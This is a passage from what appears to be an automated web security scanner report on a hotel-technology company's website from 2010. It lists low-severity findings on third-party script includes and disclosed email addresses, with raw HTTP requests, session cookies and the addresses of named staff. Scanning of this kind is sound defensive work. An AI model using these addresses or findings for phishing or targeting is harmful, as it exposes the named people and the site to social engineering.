Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:31:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24459


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.45. http://www.sabrehospitality.com/press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/siteworx-and-sabre-hospitality-solutions-partner-with-mandarin-oriental-hotel-group-to-deliver-user-friendly-interactive-mobile-web-site HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:36:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25799


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.46. http://www.sabrehospitality.com/press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:40:11 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25793


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.47. http://www.sabrehospitality.com/privacy-policy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /privacy-policy.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy-policy.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:13:51 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19854


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.48. http://www.sabrehospitality.com/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /search.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:16:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11061


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.49. http://www.sabrehospitality.com/site-map.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /site-map.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:20:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14059


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.50. http://www.sabrehospitality.com/subscribe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /subscribe.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscribe.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:22:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16794


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
7. Email addresses disclosed  previous  next
There are 23 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

7.1. http://www.sabrehospitality.com/contact-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /contact-us.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-us.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:14:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36846


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<input type="hidden" name="debugEmail" value="achrist@esitemarketing.com">
...[SNIP]...
<a href="mailto:SHSSalesRequest@sabre.com ">SHSSalesRequest@sabre.com </a>
...[SNIP]...
7.2. http://www.sabrehospitality.com/js/belated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/belated.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/belated.js HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:59:19 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 30 Jun 2009 06:50:50 GMT
ETag: "27ce38-1b6b-3a218680"
Accept-Ranges: bytes
Content-Length: 7019
Connection: close
Content-Type: application/x-javascript

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD_belat
...[SNIP]...
7.3. http://www.sabrehospitality.com/js/modal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/modal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/modal.js HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:59:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 25 Feb 2010 04:34:37 GMT
ETag: "27cc51-f27-4ce57140"
Accept-Ranges: bytes
Content-Length: 3879
Connection: close
Content-Type: application/x-javascript

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqmodal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...
7.4. http://www.sabrehospitality.com/js/roundies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/roundies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/roundies.js HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:59:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Jan 2009 03:19:06 GMT
ETag: "27cbd7-20ed-6751be80"
Accept-Ranges: bytes
Content-Length: 8429
Connection: close
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Us
...[SNIP]...
7.5. http://www.sabrehospitality.com/press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution

Issue detail

The following email address was disclosed in the response:

Request

GET /press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:36:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25158


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.6. http://www.sabrehospitality.com/press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity

Issue detail

The following email address was disclosed in the response:

Request

GET /press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:33:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22122


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.7. http://www.sabrehospitality.com/press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions

Issue detail

The following email address was disclosed in the response:

Request

GET /press/award-winning-indonesian-resort-increases-online-revenue-over-200-percent-with-sabre-hospitality-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23013


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.8. http://www.sabrehospitality.com/press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions

Issue detail

The following email address was disclosed in the response:

Request

GET /press/cornell-universitys-statler-hotel-selects-sabre-hospitality-solutions-for-its-comprehensive-distribution-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22763


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.9. http://www.sabrehospitality.com/press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider

Issue detail

The following email address was disclosed in the response:

Request

GET /press/de-historiske-sees-revenue-nearly-double-since-choosing-sabre-hospitality-solutions-as-marketing-provider HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23436


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.10. http://www.sabrehospitality.com/press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/fast-growing-asia-pacific-hotel-chain-park-hotel-group-switches-to-sabre-hospitality-solutions-for-distribution-expertise HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:51:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24391


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:gunalan@parkhotelgroup.com" target="_blank">gunalan@parkhotelgroup.com</a>
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.11. http://www.sabrehospitality.com/press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider

Issue detail

The following email address was disclosed in the response:

Request

GET /press/largest-japanese-hotel-consortium-switches-to-sabre-hospitality-solutions-as-marketing-provider HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:51:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22972


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.12. http://www.sabrehospitality.com/press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise

Issue detail

The following email address was disclosed in the response:

Request

GET /press/outdoor-traveler-destinations-launches-new-brand-affiliation-program-with-sabre-hospitality-solutions-distribution-and-marketing-expertise HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:26:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24103


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.13. http://www.sabrehospitality.com/press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009

Issue detail

The following email address was disclosed in the response:

Request

GET /press/over-usd-95-billion-generated-in-hotel-room-revenue-as-record-numbers-of-hoteliers-select-newly-formed-sabre-hospitality-solutions-in-2009 HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:37:58 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24543


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.14. http://www.sabrehospitality.com/press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider  previous  next

Summary

Severity:   Information
